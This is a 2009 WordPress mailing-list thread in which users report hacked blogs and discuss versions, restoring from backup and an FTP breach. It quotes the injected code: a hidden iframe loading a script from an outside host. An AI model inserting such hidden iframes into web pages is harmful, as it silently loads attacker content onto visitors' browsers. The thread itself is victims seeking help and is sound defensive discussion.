[wp-testers] Default.widgets.php Hacked? What to do?

Navjot Singh navjotjsingh at gmail.com
Thu Jul 23 21:19:50 UTC 2009


Yeah..my Wordpress mu install also got hacked. Just confirmed.

On Fri, Jul 24, 2009 at 2:48 AM, dinu<hello at offlineblog.net> wrote:
> I had to restore from backup. the entire blog
> when I first saw Default.widgets.php hacked, I tried restoring only that
> page. But then I found hidden iframe codes on all of my pages ( including
> pages after login )
>
> when I contacted Dreamhost support, they said it was an ftp hack. So, I
> would think its not a wordpress issue.
>
> On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh <navjotjsingh at gmail.com>wrote:
>
>> 2.8.1 at the time of being hacked. Just upgraded to 2.8.2
>>
>> On Fri, Jul 24, 2009 at 2:31 AM, Joshua
>> Dunbar<josh2007 at findingjesustoday.com> wrote:
>> > What version of wordpress are you running?
>> >
>> > --------------------------------------------------
>> > From: "Chris Carter" <carter.chris at gmail.com>
>> > Sent: Thursday, July 23, 2009 3:43 PM
>> > To: <wp-testers at lists.automattic.com>
>> > Cc: <wp-testers at lists.automattic.com>; <wp-hackers at lists.automattic.com>
>> > Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
>> >
>> >> I keep getting hacked with that code inserted into admin/default-filters
>> >>
>> >> Chris Carter
>> >> President
>> >> 314media.com
>> >> 314-714-5448
>> >>
>> >> On Jul 23, 2009, at 3:31 PM, Navjot Singh <navjotjsingh at gmail.com>
>>  wrote:
>> >>
>> >>> I have a blog running on 2.8.2 and suddenly now I find all index.php
>> >>> and wp-includes/Default.widgets.php hacked with following code
>> >>> inserted randomly :
>> >>>
>> >>> <iframe src="http://u1j.in:8080/ts/in.cgi?pepsi109" width=125
>> >>> height=125 style="visibility: hidden"></iframe>
>> >>>
>> >>> How to prevent further hacking? I am currently replacing all the files
>> >>> affected since all of them affected at a certain date. I am on a
>> >>> shared hosting and only one blog got attacked.
>> >>>
>> >>> Regards
>> >>> Navjot Singh
>> >>> _______________________________________________
>> >>> wp-testers mailing list
>> >>> wp-testers at lists.automattic.com
>> >>> http://lists.automattic.com/mailman/listinfo/wp-testers
>> >>
>> >> _______________________________________________
>> >> wp-testers mailing list
>> >> wp-testers at lists.automattic.com
>> >> http://lists.automattic.com/mailman/listinfo/wp-testers
>> >
>> > _______________________________________________
>> > wp-testers mailing list
>> > wp-testers at lists.automattic.com
>> > http://lists.automattic.com/mailman/listinfo/wp-testers
>> >
>> _______________________________________________
>> wp-testers mailing list
>> wp-testers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>
>
>
>
> --
> With Love
> Dinu
>
> http://chromestory.com
> http://offlineblog.net
> _______________________________________________
> wp-testers mailing list
> wp-testers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-testers
>


More information about the wp-testers mailing list